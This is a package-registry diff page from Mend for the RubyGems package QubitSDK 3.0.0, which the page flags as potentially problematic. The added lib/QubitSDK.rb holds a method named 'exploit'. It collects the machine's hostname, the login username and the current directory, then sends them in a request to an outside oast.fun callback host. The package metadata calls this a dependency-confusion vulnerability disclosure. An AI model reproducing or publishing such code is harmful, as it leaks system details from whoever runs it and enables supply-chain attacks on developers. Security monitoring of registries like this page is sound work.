RubyGems - QubitSDK - Versions diffs - 3.0.0 - Mend

QubitSDK 3.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of QubitSDK might be problematic. Click here for more details.

Files changed (3) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: e8505f66daa199c4a025eef8f7eacdb87ff21e6fa655d9f2b5b905ef6a4cebe0
+  data.tar.gz: f8ccf28395e53267d23ab343afedcfa2e3277c328d2bea54705500e96bea6af0
+SHA512:
+  metadata.gz: 901db0e597df91c518c1a5a53572808347e47f251414f34ccb00380efdad034f27096fcc33410b0f8e5a773460cc699b5327fd5d9924c6f1cd005803e8dc87f1
+  data.tar.gz: a707e91b1d582db76fdba1827e5e054ae976895429d2662447e2d7bcfb50bc6058b7325f4c899bb310285930ef0bc8acfabaf62baa626220f336424fcd9f2014

data/lib/QubitSDK.rb ADDED Viewed

@@ -0,0 +1,30 @@
+# frozen_string_literal: true
+require_relative "QubitSDK/version"
+require 'net/http'
+require 'socket'
+require 'etc'
+module QubitSDK
+  def self.exploit
+    hostname = Socket.gethostname
+    username = Etc.getlogin
+    cwd = Dir.pwd
+    uri = URI('https://chyfh952vtc000056sk0ge98awoyyyyyb.oast.fun')
+    params = { 'hostname' => hostname, 'username' => username, 'cwd' => cwd }
+    uri.query = URI.encode_www_form(params)
+    res = Net::HTTP.get_response(uri)
+    # Add any additional code here based on the desired behavior of the exploit
+    # Example: Printing the response
+    puts res.body
+  end
+end
+# Run the exploit when the QubitSDK.rb file is executed directly
+if __FILE__ == $0
+  QubitSDK.exploit
+end

metadata ADDED Viewed

@@ -0,0 +1,43 @@
+--- !ruby/object:Gem::Specification
+name: QubitSDK
+version: !ruby/object:Gem::Version
+  version: 3.0.0
+platform: ruby
+authors:
+- Pranay
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2023-06-04 00:00:00.000000000 Z
+dependencies: []
+description: This Ruby package vulnerable to dependency confiuse vulnerability
+email: Bughunter@gmail.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- lib/QubitSDK.rb
+homepage: https://rubygems.org/gems/QubitSDK.rb
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.3.15
+signing_key:
+specification_version: 4
+summary: 'Vulnerability Disclosure: Dependency confiuse vulnerability'
+test_files: []